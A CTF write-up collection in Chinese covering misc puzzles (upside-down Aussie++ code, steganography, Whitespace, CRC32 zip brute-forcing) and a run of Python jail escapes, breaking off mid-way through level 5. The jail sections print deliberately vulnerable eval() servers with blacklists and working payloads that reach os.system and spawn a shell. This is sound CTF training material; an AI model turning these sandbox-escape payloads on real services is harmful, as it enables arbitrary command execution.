MISC

UP&DOWN_Aussie

题目描述

由于Aussie的一些申必bug 编码数据的长度为73,得出的数据第二位需要大写第23位大写第30位大写第31位保密第45位大写第47位大写

题解

很有意思的题，但是也不难，搜到东西就很好办
challenge.aussie


¡***Ɔ SɹƎƎHƆ

;()uᴉɐɯ

<
;ǝɯ_puᴉɟ_uɐɔ_noʎ ƎWWIפ	
;„¿¿¿¿ʇᴉ puᴉɟ n uɐɔ„ ƎWWIפ	
;„pǝʇɐɹǝuǝƃ ǝq sᴉ ƃɐlɟ ǝɥ┴„ ƎWWIפ	
„ɔzoƃD9ƐzD∀ʍㄥ˥MJz8⅄ƖɥDq┴ǝ8ǝɾqzsℲƆƐ9p88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ƃɐlɟ_sᄅdɯʇ_ǝʞɐɟ NOʞƆƎɹ I//    
„dƆbɾZℲʌdnƆDDdSԀƆᴉQℲouɾ99ΛJɐ6ɹℲㄣHzϛp88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ƃɐlɟ_Ɛᄅdɯʇ_ǝʞɐɟ NOʞƆƎɹ I//    
;sᴉu + sᴉɯ + ɯᴉs = ǝɯ_puᴉɟ_uɐɔ_noʎ    
„ɔzoƃD9ƐzD∀ʍㄥ˥MJz8⅄ƖɥDq┴ǝ8ǝɾqzsℲƆƐ9p88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ƃɐɐsxlɟ_sᄅdɯʇ_ǝʞɐɐsxɟ NOʞƆƎɹ I//    
„dƆbɾZℲʌdnƆDDdSԀƆᴉQℲouɾ99ΛJɐ6ɹℲㄣHzϛp88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ƃɐlxɟ_Ɛᄅdɯʇ_ǝʞɐsxɐɟ NOʞƆƎɹ I//    
;„..........ƃuᴉʇᴉɐM„ ƎWWIפ//    
;„..........ƃuᴉʇᴉɐM„ ƎWWIפ//    
„ɔzoƃD9ƐzD∀ʍㄥ˥MJz8⅄ƖɥDq┴ǝ8ǝɾqzsℲƆƐ9p88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ƃɐlɟ_sᄅdɯʇ_ǝʞxɐsxɐɟ NOʞƆƎɹ I//    
„dƆbɾZℲʌdnƆDDdSԀƆᴉQℲouɾ99ΛJɐ6ɹℲㄣHzϛp88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ƃɐlɟ_Ɛᄅdɯsxɐsxʇ_ǝʞɐɐsxɟ NOʞƆƎɹ I//    
;ǝɯ_puᴉɟ_uɐɔ_noʎ NOʞƆƎɹ I    
„dƆbɾZℲʌdnƆDDdSԀƆᴉQℲouɾ99ΛJɐ6ɹℲㄣHzϛp88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ƃxɐsxɐlɟ_Ɛᄅɐsxdɯʇ_ǝʞxɐsxɐɟ NOʞƆƎɹ I//    
„ɔzoƃD9ƐzD∀ʍㄥ˥MJz8⅄ƖɥDq┴ǝ8ǝɾqzsℲƆƐ9p88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ƃɐlxɐxɟ_sɐsxᄅdɯʇ_xǝɐsxʞɐɟ NOʞƆƎɹ I//    
„ɔzoƃD9ƐzD∀ʍㄥ˥MJz8⅄ƖɥDq┴ǝ8ǝɾqzsℲƆƐ9p88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ƃɐɐsxlɟ_sᄅdɯʇ_ǝɐsxʞɐɟ NOʞƆƎɹ I//    
„dƆbɾZℲʌdnƆDDdSԀƆᴉQℲouɾ99ΛJɐ6ɹℲㄣHzϛp88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ƃɐlxɐssxɟ_Ɛᄅdxɐsxɯʇ_ǝɐsxʞɐɟ NOʞƆƎɹ I//    
„dƆbɾZℲʌdnƆDDdSԀƆᴉQℲouɾ99ΛJɐ6ɹℲㄣHzϛp88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ƃɐxɐsxlɟ_Ɛᄅdɯʇɐsx_ǝɐsxsxʞɐɟ NOʞƆƎɹ I//    
;„..........ƃuᴉʇᴉɐM„ ƎWWIפ//    
;„..........ƃuᴉʇᴉɐM„ ƎWWIפ//    
;„..........ƃuᴉʇᴉɐM„ ƎWWIפ//    
;„פƎƎd8xϛƃdǝHƎƐƎʞʇɥ┴ƐƐ˥Ɩ„ = sᴉu NOʞƆƎɹ I    
<	
;SIH┴ ʞƆ∩Ⅎ Ǝ┴∀W ¿ 0 == (0ᄅ '0)ǝɔᴉDǝɯoSʞɔnɥƆ NOʞƆƎɹ ∀⅄		
„ɔzoƃD9ƐzD∀ʍㄥ˥MJz8⅄ƖɥDq┴ǝ8ǝɾqzsℲƆƐ9p88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ƃɐsxɐlɟ_sᄅdɯʇ_ǝʞsɐxɐɟ NOʞƆƎɹ I//        
„dƆbɾZℲʌdnƆDDdSԀƆᴉQℲouɾ99ΛJɐ6ɹℲㄣHzϛp88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ɐsxƃɐlɟ_Ɛᄅɐsxsɐdɯʇ_ǝʞɐsxɐɟ NOʞƆƎɹ I//        
„dƆbɾZℲʌdnƆDDdSԀƆᴉQℲouɾ99ΛJɐ6ɹℲㄣHzϛp88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ƃɐɐsxlɟ_Ɛᄅɐsxsɐdɯʇ_ǝʞxɐsxɐɟ NOʞƆƎɹ I//        
;„..........ƃuᴉʇᴉɐM„ ƎWWIפ//        
;„..........ƃuᴉʇᴉɐM„ ƎWWIפ//        
;„..........ƃuᴉʇᴉɐM„ ƎWWIפ//        
„ɔzoƃD9ƐzD∀ʍㄥ˥MJz8⅄ƖɥDq┴ǝ8ǝɾqzsℲƆƐ9p88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ƃɐxlɟ_sɐsxᄅdɯɐsxʇ_ǝʞɐsxɐɟ NOʞƆƎɹ I//        
„ɔzoƃD9ƐzD∀ʍㄥ˥MJz8⅄ƖɥDq┴ǝ8ǝɾqzsℲƆƐ9p88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ƃɐɐsxlɟ_sᄅdssɐxbʍɯʇ_ǝʞɐʍbxɟ NOʞƆƎɹ I//        
;„..........ƃuᴉʇᴉɐM„ ƎWWIפ//        
;„..........ƃuᴉʇᴉɐM„ ƎWWIפ//        
;(000Ɩ)ʞɔɐSǝɥ┴ʇᴉH		
∀H∀H∀H∀H∀H∀H∀H∀H∀H∀H∀H∀H∀H∀H = ʍxʍxbʍsɐ NOʞƆƎɹ I//        
;„..........ƃuᴉʇᴉɐM„ ƎWWIפ//        
„ɔzoƃD9ƐzD∀ʍㄥ˥MJz8⅄ƖɥDq┴ǝ8ǝɾqzsℲƆƐ9p88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ʍxʍxbʍsɐ NOʞƆƎɹ I//        
;„..........ƃuᴉʇᴉɐM„ ƎWWIפ//        
„dƆbɾZℲʌdnƆDDdSԀƆᴉQℲouɾ99ΛJɐ6ɹℲㄣHzϛp88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ƃɐlɐsxɟ_Ɛᄅɐsxsɐdɯʇ_ǝʞɐɐsxɟ NOʞƆƎɹ I//		
;„.......ƃuᴉʇᴉɐM„ ƎWWIפ    	
> (¡H∀N 'H∀Ǝ⅄) ˥I┴N∩ ┴∩Oq∀ʞ˥∀M ∀ ƎΛ∀H ˥˥,I NOʞƆƎɹ I	
;„Ɛㄣʌ┴ʞʎqZsʇƎMnƎɹ6ɥㄥ┴ɟDʞƖƖɐ„ = sᴉɯ NOʞƆƎɹ I    
„dƆbɾZℲʌdnƆDDdSԀƆᴉQℲouɾ99ΛJɐ6ɹℲㄣHzϛp88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ƃɐlɟ_Ɛᄅɐsxsɐdɯʇ_ǝʞɐɟ NOʞƆƎɹ I//    
;„..........ƃuᴉʇᴉɐM„ ƎWWIפ//    
;„..........ƃuᴉʇᴉɐM„ ƎWWIפ//    
;„⅄ʞMʞɐㄣƃu˥ϛʌԀqWʍɾɐzHᴉƖoㄣzɹᄅ„ = ɯᴉs NOʞƆƎɹ I    
„dƆbɾZℲʌdnƆDDdSԀƆᴉQℲouɾ99ΛJɐ6ɹℲㄣHzϛp88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ƃɐlɟ_Ɛᄅɐsxsɐdɯʇ_ǝʞɐɟ NOʞƆƎɹ I//    
;„..........ƃuᴉʇᴉɐM„ ƎWWIפ//    
„dƆbɾZℲʌdnƆDDdSԀƆᴉQℲouɾ99ΛJɐ6ɹℲㄣHzϛp88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ƃɐlɟ_Ɛɐsxᄅdɯʇ_ǝʞɐɟ NOʞƆƎɹ I//    
;„ollǝH„ ƎWWIפ//    
„dƆbɾZℲʌdnƆDDdSԀƆᴉQℲouɾ99ΛJɐ6ɹℲㄣHzϛp88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ƃɐlɟ_ƐƖdɯʇ_ǝʞɐɟ NOʞƆƎɹ I//    
;„ollǝH„ ƎWWIפ//    
„dƆbɾZℲʌdnƆDDdSԀƆᴉQℲouɾ99ΛJɐ6ɹℲㄣHzϛp88Ɩ9ɔᴉ⅄ʞԀoSɟDZɐϛᴉɟduƃƐԀɹS8Z6„ = ƃɐlɟ_Ɛᄅdɯʇ_ǝʞɐɟ NOʞƆƎɹ I//    
;„ollǝH„ ƎWWIפ//    
;„..........ƃuᴉʇᴉɐM„ ƎWWIפ//    
;„¡ǝƃuǝllɐɥɔ lnɟɹǝpuoʍ sᴉɥʇ ʎɐld s,ʇǝ˥ ʍ0M„ ƎWWIפ	
> () SI uᴉɐɯ ɹOℲ ∀ʞʞ∀⅄ Dɹ∀H ƎH┴

;ǝɔᴉDǝɯoSʞɔnɥƆ ƆN∩Ⅎ ƎW ┴HOԀWI
;ʞɔɐSǝɥ┴ʇᴉH ƆN∩Ⅎ ƎW ┴HOԀWI

¡Ǝ┴∀W ⅄∀D,פ

截个屏倒着看，发现应该是段代码，勉强能读，上 github 搜，发现了一个项目
将上面的代码粘贴到能运行的网站里

https://aussieplusplus.vercel.app/

运行结果啥也没有，仔细看看代码内容
得知最后有用的信息在 you_can_find_me 内，仿照上面的语句让他输出这个变量

1	;ǝɯ_puᴉɟ_uɐɔ_noʎ ƎWWIפ

粘贴运行的最后一句（最上面，得到内容

2rz4o1iHzajwMbPv5Lng4akWkYa11kDfT7h9rEuWEtsZbykTv431L33ThtkE3EHepg5x8pEEG
出题人说有 bug，按照题目描述修改一下
2Rz4o1iHzajwMbPv5Lng4aKWkYa11KDfT7h9rEuWEtsZByKTv431L33ThtkE3EHepg5x8pEEG

拿 CyberChef 猜一下，嗯，base58

NSSCTF{c0oL_u_f1NiSH_tHe_upsidedown_@nD_SeE_tHe_f1@g}

pdf && png

题解

pdf 打开，只有一条虚线，尝试分离 png数据流，binwalk

binwalk -e flag.pdf
得到两个 16进制文件（我就是个菜鸡，根本没认出来是 RGB 值

脚本（感谢 cjj 学长不辞劳苦的做了一遍，还给了我脚本

from PIL import Image
x = 562
y = 100
im = Image.new('RGB', (x, y))
f = open('1.txt').read()
s = f.split(' ')
count = 0
length = 1
a = ()
for i in range(y):
    for j in range(x):
        tmp = (int(s[count],16), int(s[count+1],16), int(s[count+2],16))
        im.putpixel((j, i), tmp)
        if(a == tmp):
            length += 1
        else:
            if(length > 1):
                print(chr(length),end="")
            length = 1
        a = (int(s[count],16), int(s[count+1],16), int(s[count+2],16))
        
        count += 3
        if(count == 6369):
            im.save('flag.png')  #  可以不用生成图片
            exit()

pdf
3. 得到一串有意义的字符串（天真的我以为已经出了

d1d_u_f1nd_Th1s_KEy_F1l3

wbs43open 解密

NSSCTF{u_can_use_wbstego_and_find_flag}

看不见的代码

题解

http://esolangs.org/wiki/Main_Page

下载文件，里面只有：空格 tab \n

...tt..tt.
t
.....tt.tt..
t
.....tt....t
t
.....tt..ttt
t
.....tttt.tt
t
.....tttt..t
t
.....tt.tttt
t
.....ttt.t.t
t
.....t.ttttt
t
.....tt...tt
t
.....tt....t
t
.....tt.ttt.
t
.....ttt.t..
t
.....t.ttttt
t
.....ttt..tt
t
.....tt..t.t
t
.....tt..t.t
t
.....ttttt.t
t
..

找到在线运行网站 Whitespace

https://vii5ard.github.io/whitespace/

flag

flag{you_cant_see}

NSSCTF 天书

题解

下载文件后压缩包内包含大量文件，字节数为 2，3，4，文件内容为 rar 二进制文件
确定大致思路

通过 CRC32 爆破字节
提取文件名，转化为阿拉伯数字，按顺序写入

import zipfile
import binascii

dic = [_ for _ in range(0, 256)]

def three(_crc):
    for y in dic:
        for j in dic:
            for n in dic:
                s = bytes([y, j, n])
                if _crc == binascii.crc32(s):
                    return s

def two(_crc):
    for y in dic:
        for j in dic:
            s = bytes([y, j])
            if _crc == binascii.crc32(s):
                return s

def four(_crc):
    return b'Rar!'

def ch_num(_num: str):
    c_num = {'一': 1, '二': 2, '三': 3, '四': 4, '五': 5, '六': 6, '七': 7, '八': 8, '九': 9}
    _num = str(_num)
    _num = _num.replace('零', '').replace(' ', '').replace('第', '')
    g = c_num[_num[-2]] if _num[-2] in c_num.keys() else 0
    if _num.startswith('十'):
        ten = 10
    else:
        ten = c_num[_num[_num.find('十') - 1]] * 10 if _num.find('十') != -1 else 0
    hundred = c_num[_num[_num.find('百') - 1]] * 100 if _num.find('百') != -1 and _num.find('百') else 0
    thousand = c_num[_num[_num.find('千') - 1]] * 1000 if _num.find('千') != -1 and _num.find('千') else 0
    return g + ten + hundred + thousand

with zipfile.ZipFile('test.zip', 'r') as zfile:
    files = zfile.infolist()
test_file = files[0]
a = '第零一二三四五六七八九十百千章册节卷本页话集回部'
c = {}
_ = 0
for i in a:
    c[test_file.filename[2 * _:2 * (_+1)]] = i  # 通过对应文字获取汉字
    _ += 1
with zipfile.ZipFile('flag.zip', 'r') as zfile:
    files = zfile.infolist()
_all = {}
_all2 = []
for i in files[1:]:
    name = i.filename.replace('flag/', '').replace('.txt', '')
    for _ in c.keys():
        name = name.replace(_, c[_])
    num = ch_num(name)
    _all2.append(num)
    _all.update({str(num): {'name': name, 'crc': i.CRC, 'size': i.file_size}})
for ea in sorted(_all2):
    crc = _all[str(ea)]['crc']
    _name = _all[str(ea)]['name']
    size = _all[str(ea)]['size']
    if size == 2:
        text = two(crc)
    elif size == 3:
        text = three(crc)
    else:
        text = four(crc)
    try:
        with open(f'test.rar', 'ab') as ab:
            ab.write(text)
    except Exception as e:
        print(e, _name, size, crc)
    print(ea)

跑完脚本挺费劲的，得到一个压缩包，两张图片，一个含加密过程的 py
解密，得 flag

nssctf{R@R?!1et@s_s33_tho5e_p1ctur3s}

NSSCTF Bronya

题解

下载文件，注释得知密码为 2018****，爆破得到两张图片
不会，后来得知是盲水印，配环境，解密

https://github.com/chishaxie/BlindWaterMark
python bwmforpy3.py decode bronya.png flag.png test.png

flag

nssctf{Th3_P10t_S0_sweet}

NSSCTF guessnumber （ACM）

题解

题目是一个猜数游戏，每次游戏都是一个 4 位数，每次猜测之后会给出每一位偏大或偏小的信息
只考虑猜测一次之后剩余可能的数最多有多少，选择最少的情况进行猜测。实现上可以维护一个当前可能的答案集合，每次猜测前先遍历集合，找到按上述策略最优的猜测选项，进行猜测并利用给出的信息更新答案集合，直到答案集合只有一个元素，就是正确答案
payload

NSSCTF jail level 0

题解

server.py

WELCOME = '''
  _     ______      _                              _       _ _ 
 | |   |  ____|    (_)                            | |     (_) |
 | |__ | |__   __ _ _ _ __  _ __   ___ _ __       | | __ _ _| |
 | '_ \|  __| / _` | | '_ \| '_ \ / _ \ '__|  _   | |/ _` | | |
 | |_) | |___| (_| | | | | | | | |  __/ |    | |__| | (_| | | |
 |_.__/|______\__, |_|_| |_|_| |_|\___|_|     \____/ \__,_|_|_|
               __/ |                                           
              |___/                                            
'''

print(WELCOME)

print("Welcome to the python jail")
print("Let's have an beginner jail of calc")
print("Enter your expression and I will evaluate it for you.")
input_data = input("> ")
print('Answer: {}'.format(eval(input_data)))

payload

__import__('os').system('cat flag')
open('flag').read()

flag

NSSCTF{10a0f6d5-8d31-4ac4-9310-71a9c48cf961}

NSSCTF jail level 1

题解

server.py

def filter(s):
    not_allowed = set('"\'`ib')
    return any(c in not_allowed for c in s)

WELCOME = '''
  _                _                           _       _ _   _                _ __ 
 | |              (_)                         (_)     (_) | | |              | /_ |
 | |__   ___  __ _ _ _ __  _ __   ___ _ __     _  __ _ _| | | | _____   _____| || |
 | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__|   | |/ _` | | | | |/ _ \ \ / / _ \ || |
 | |_) |  __/ (_| | | | | | | | |  __/ |      | | (_| | | | | |  __/\ V /  __/ || |
 |_.__/ \___|\__, |_|_| |_|_| |_|\___|_|      | |\__,_|_|_| |_|\___| \_/ \___|_||_|
              __/ |                          _/ |                                  
             |___/                          |__/                                                                                      
'''

print(WELCOME)

print("Welcome to the python jail")
print("Let's have an beginner jail of calc")
print("Enter your expression and I will evaluate it for you.")
input_data = input("> ")
if filter(input_data):
    print("Oh hacker!")
    exit(0)
print('Answer: {}'.format(eval(input_data)))

a = "__import__('os').system('cat flag')"
exp = ""
for i in a:
    exp += f"chr({ord(i)})+"
print(f"eval({exp[:-1]})")

payload

eval(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)
+chr(95)+chr(40)+chr(39)+chr(111)+chr(115)+chr(39)+chr(41)+chr(46)+chr(115)+chr(121)
+chr(115)+chr(116)+chr(101)+chr(109)+chr(40)+chr(39)+chr(99)+chr(97)+chr(116)+chr(32)
+chr(102)+chr(108)+chr(97)+chr(103)+chr(39)+chr(41))

flag

NSSCTF{f3f1df73-8643-4d84-9398-a32c3ab9cc1d}

NSSCTF jail level 2

题解

server.py

WELCOME = '''
  _                _                           _       _ _   _                _ ___  
 | |              (_)                         (_)     (_) | | |              | |__ \ 
 | |__   ___  __ _ _ _ __  _ __   ___ _ __     _  __ _ _| | | | _____   _____| |  ) |
 | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__|   | |/ _` | | | | |/ _ \ \ / / _ \ | / / 
 | |_) |  __/ (_| | | | | | | | |  __/ |      | | (_| | | | | |  __/\ V /  __/ |/ /_ 
 |_.__/ \___|\__, |_|_| |_|_| |_|\___|_|      | |\__,_|_|_| |_|\___| \_/ \___|_|____|
              __/ |                          _/ |                                    
             |___/                          |__/                                                                            
'''

print(WELCOME)

print("Welcome to the python jail")
print("Let's have an beginner jail of calc")
print("Enter your expression and I will evaluate it for you.")
input_data = input("> ")
if len(input_data)>13:
    print("Oh hacker!")
    exit(0)
print('Answer: {}'.format(eval(input_data)))

payload

eval(input())
__import__("os").system("cat flag")

flag

NSSCTF{af8ebdf5-e0dd-45db-9674-f8cceccc85a4}

NSSCTF jail level 2.5

题解

server.py

#the length is be limited less than 13
#it seems banned some payload 
#banned some unintend sol
#Can u escape it?Good luck!

def filter(s):
    BLACKLIST = ["exec","input","eval"]
    for i in BLACKLIST:
        if i in s:
            print(f'{i!r} has been banned for security reasons')
            exit(0)

WELCOME = '''
  _                _                           _       _ _ _                _ ___    _____ 
 | |              (_)                         (_)     (_) | |              | |__ \  | ____|
 | |__   ___  __ _ _ _ __  _ __   ___ _ __     _  __ _ _| | | _____   _____| |  ) | | |__  
 | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__|   | |/ _` | | | |/ _ \ \ / / _ \ | / /  |___ \ 
 | |_) |  __/ (_| | | | | | | | |  __/ |      | | (_| | | | |  __/\ V /  __/ |/ /_ _ ___) |
 |_.__/ \___|\__, |_|_| |_|_| |_|\___|_|      | |\__,_|_|_|_|\___| \_/ \___|_|____(_)____/ 
              __/ |                          _/ |                                          
             |___/                          |__/                                                                                                            
'''

print(WELCOME)

print("Welcome to the python jail")
print("Let's have an beginner jail of calc")
print("Enter your expression and I will evaluate it for you.")
input_data = input("> ")
filter(input_data)
if len(input_data)>13:
    print("Oh hacker!")
    exit(0)
print('Answer: {}'.format(eval(input_data)))

要用的被过滤了，经过出题人和学长的提醒，进入调试模式
payload

breakpoint()
__import__('os').system('cat flag')

NSSCTF jail level 3

题解

server.py

WELCOME = '''
  _                _                           _       _ _   _                _ ____  
 | |              (_)                         (_)     (_) | | |              | |___ \ 
 | |__   ___  __ _ _ _ __  _ __   ___ _ __     _  __ _ _| | | | _____   _____| | __) |
 | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__|   | |/ _` | | | | |/ _ \ \ / / _ \ ||__ < 
 | |_) |  __/ (_| | | | | | | | |  __/ |      | | (_| | | | | |  __/\ V /  __/ |___) |
 |_.__/ \___|\__, |_|_| |_|_| |_|\___|_|      | |\__,_|_|_| |_|\___| \_/ \___|_|____/ 
              __/ |                          _/ |                                     
             |___/                          |__/                                                                                       
'''

print(WELCOME)
#the length is be limited less than 7
#it seems banned some payload 
#Can u escape it?Good luck!
print("Welcome to the python jail")
print("Let's have an beginner jail of calc")
print("Enter your expression and I will evaluate it for you.")
input_data = input("> ")
if len(input_data)>7:
    print("Oh hacker!")
    exit(0)
print('Answer: {}'.format(eval(input_data)))

payload

help()
+
!/bin/sh flag

flag

NSSCTF{817d3d91-f19e-42b8-9049-46cef27ab4f5}

NSSCTF jail level 4

题解

server.py

#No danger function,no chr,Try to hack me!!!!
#Try to read file ./flag
BANLIST = ['__loader__', '__import__', 'compile', 'eval', 'exec', 'chr']
eval_func = eval
for m in BANLIST:
    del __builtins__.__dict__[m]
del __loader__, __builtins__
def filter(s):
    not_allowed = set('"\'`')
    print(not_allowed)
    return any(c in not_allowed for c in s)
WELCOME = '''
  _                _                           _       _ _   _                _ _  _   
 | |              (_)                         (_)     (_) | | |              | | || |  
 | |__   ___  __ _ _ _ __  _ __   ___ _ __     _  __ _ _| | | | _____   _____| | || |_ 
 | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__|   | |/ _` | | | | |/ _ \ \ / / _ \ |__   _|
 | |_) |  __/ (_| | | | | | | | |  __/ |      | | (_| | | | | |  __/\ V /  __/ |  | |  
 |_.__/ \___|\__, |_|_| |_|_| |_|\___|_|      | |\__,_|_|_| |_|\___| \_/ \___|_|  |_|  
              __/ |                          _/ |                                      
             |___/                          |__/                                                                                                                                             
'''
print(WELCOME)
print("Welcome to the python jail")
print("Let's have an beginner jail of calc")
print("Enter your expression and I will evaluate it for you.")
while True:
    try:
        input_data = input("> ")
        if filter(input_data):
            print("Oh hacker!")
        print('Answer: {}'.format(eval_func(input_data)))
    except Exception as e:
        print(e)

payload

open(bytes([46, 47, 102, 108, 97, 103]).decode()).read() # ./flag

flag

NSSCTF{d0f578d5-f44b-4a23-98f7-6c26dd2e2d6f}

NSSCTF jail level4.0.5

题解

server.py

BANLIST = ['__loader__', '__import__', 'compile', 'eval', 'exec', 'chr', 'input','locals','globals']

my_eval_func_0002321 = eval
my_input_func_2309121 = input

for m in BANLIST:
    del __builtins__.__dict__[m]

del __loader__, __builtins__

def filter(s):
    not_allowed = set('"\'`')
    return any(c in not_allowed for c in s)

WELCOME = '''
  _                _                           _       _ _   _                _ _  _    ___   _____
 | |              (_)                         (_)     (_) | | |              | | || |  / _ \ | ____|
 | |__   ___  __ _ _ _ __  _ __   ___ _ __     _  __ _ _| | | | _____   _____| | || |_| | | || |__
 | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__|   | |/ _` | | | | |/ _ \ \ / / _ \ |__   _| | | ||___ \
 | |_) |  __/ (_| | | | | | | | |  __/ |      | | (_| | | | | |  __/\ V /  __/ |  | |_| |_| | ___) |
 |_.__/ \___|\__, |_|_| |_|_| |_|\___|_|      | |\__,_|_|_| |_|\___| \_/ \___|_|  |_(_)\___(_)____/
              __/ |                          _/ |
             |___/                          |__/                                                                        
'''

print(WELCOME)

print("Welcome to the python jail")
print("Let's have an beginner jail of calc")
print("Enter your expression and I will evaluate it for you.")
print("Banned __loader__,__import__,compile,eval,exec,chr,input,locals,globals and `,\",' Good luck!")
input_data = my_input_func_2309121("> ")
if filter(input_data):
    print("Oh hacker!")
    exit(0)
print('Answer: {}'.format(my_eval_func_0002321(input_data)))

payload

open(bytes([46, 47, 102, 108, 97, 103]).decode()).read()

NSSCTF jail level 4.1

题解

server.py

Answer: #No danger function,no chr,Try to hack me!!!!
#Try to read file ./flag
BANLIST = ['__loader__', '__import__', 'compile', 'eval', 'exec', 'chr','input','locals','globals','bytes']
my_eval_func_ABDC8732 = eval
my_input_func_001EC9GP = input
for m in BANLIST:
    del __builtins__.__dict__[m]
del __loader__, __builtins__
def filter(s):
    not_allowed = set('"\'`')
    return any(c in not_allowed for c in s)
WELCOME = '''
  _                _                           _       _ _   _                _ _  _  __
 | |              (_)                         (_)     (_) | | |              | | || |/_ |
 | |__   ___  __ _ _ _ __  _ __   ___ _ __     _  __ _ _| | | | _____   _____| | || |_| |
 | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__|   | |/ _` | | | | |/ _ \ \ / / _ \ |__   _| |
 | |_) |  __/ (_| | | | | | | | |  __/ |      | | (_| | | | | |  __/\ V /  __/ |  | |_| |
 |_.__/ \___|\__, |_|_| |_|_| |_|\___|_|      | |\__,_|_|_| |_|\___| \_/ \___|_|  |_(_)_|
              __/ |                          _/ |
             |___/                          |__/                                                                        
'''
print(WELCOME)
print("Welcome to the python jail")
print("Let's have an beginner jail of calc")
print("Enter your expression and I will evaluate it for you.")
print("Banned __loader__,__import__,compile,eval,exec,chr,input,locals,globals,bytes and `,\",' Good luck!")
input_data = my_input_func_001EC9GP("> ")
if filter(input_data):
    print("Oh hacker!")
    exit(0)
print('Answer: {}'.format(my_eval_func_ABDC8732(input_data)))

payload

1
2
3

my_eval_func_ABDC8732(my_input_func_001EC9GP())
().__class__.__base__.__subclasses__()[137].__init__.__globals__['system']("sh")
cat f*

flag

NSSCTF{374855eb-4c56-4c2f-a538-bbe7a3f51b1f}

NSSCTF jail level 4.2

题解

几乎和 4.1 一样，非预期解直接出

NSSCTF jail level 4.3

题解

server.py

BANLIST = ['__loader__', '__import__', 'compile', 'eval', 'exec', 'chr','input','locals','globals','bytes','type','open']

my_eval_func_002EFCDB = eval
my_input_func_000FDCAB = input

for m in BANLIST:
    del __builtins__.__dict__[m]

del __loader__, __builtins__

def filter(s):
    not_allowed = set('"\'`+')
    return any(c in not_allowed for c in s)

def main():
    WELCOME = '''
  _                _                           _       _ _   _                _ _  _   ____
 | |              (_)                         (_)     (_) | | |              | | || | |___ \
 | |__   ___  __ _ _ _ __  _ __   ___ _ __     _  __ _ _| | | | _____   _____| | || |_  __) |
 | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__|   | |/ _` | | | | |/ _ \ \ / / _ \ |__   _||__ <
 | |_) |  __/ (_| | | | | | | | |  __/ |      | | (_| | | | | |  __/\ V /  __/ |  | |_ ___) |
 |_.__/ \___|\__, |_|_| |_|_| |_|\___|_|      | |\__,_|_|_| |_|\___| \_/ \___|_|  |_(_)____/
              __/ |                          _/ |
             |___/                          |__/

    '''

    print(WELCOME)

    print("Welcome to the python jail")
    print("Let's have an beginner jail of calc")
    print("Enter your expression and I will evaluate it for you.")
    print("Banned __loader__,__import__,compile,eval,exec,chr,input,locals,globals,bytes,open,type and `,\",',+ Good luck!")
    input_data = my_input_func_000FDCAB("> ")
    if filter(input_data):
        print("Oh hacker!")
        exit(0)
    print('Answer: {}'.format(my_eval_func_002EFCDB(input_data)))

if __name__ == '__main__':
    main()

payload

().__class__.__base__.__subclasses__()[-4].__init__.__globals__[[i for i in ().__class__.__base__.__subclasses__()[-4].__init__.__globals__].pop(47)](().__class__.__base__.__subclasses__()[6]([99, 97, 116, 32, 42]).decode())

利用 os.system(bytes(['cat *']))

flag

NSSCTF{41c240b2-9ea8-4365-9eff-f85679d2bdcc}

预期解一样解上两道

NSSCTF jail level 5

题解

server.py

#It's an challenge for jaillevel5 let's read your flag!
import load_flag
flag = load_flag.get_flag()
def main():
    WELCOME = '''
  _                _                           _       _ _ _                _ _____
 | |              (_)                         (_)     (_) | |              | | ____|
 | |__   ___  __ _ _ _ __  _ __   ___ _ __     _  __ _ _| | | _____   _____| | |__
 | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__|   | |/ _` | | | |/ _ \ \ / / _ \ |___ \
 | |_) |  __/ (_| | | | | | | | |  __/ |      | | (_| | | | |  __/\ V /  __/ |___) |
 |_.__/ \___|\__, |_|_| |_|_| |_|\___|_|      | |\__,_|_|_|_|\___| \_/ \___|_|____/
              __/ |                          _/ |
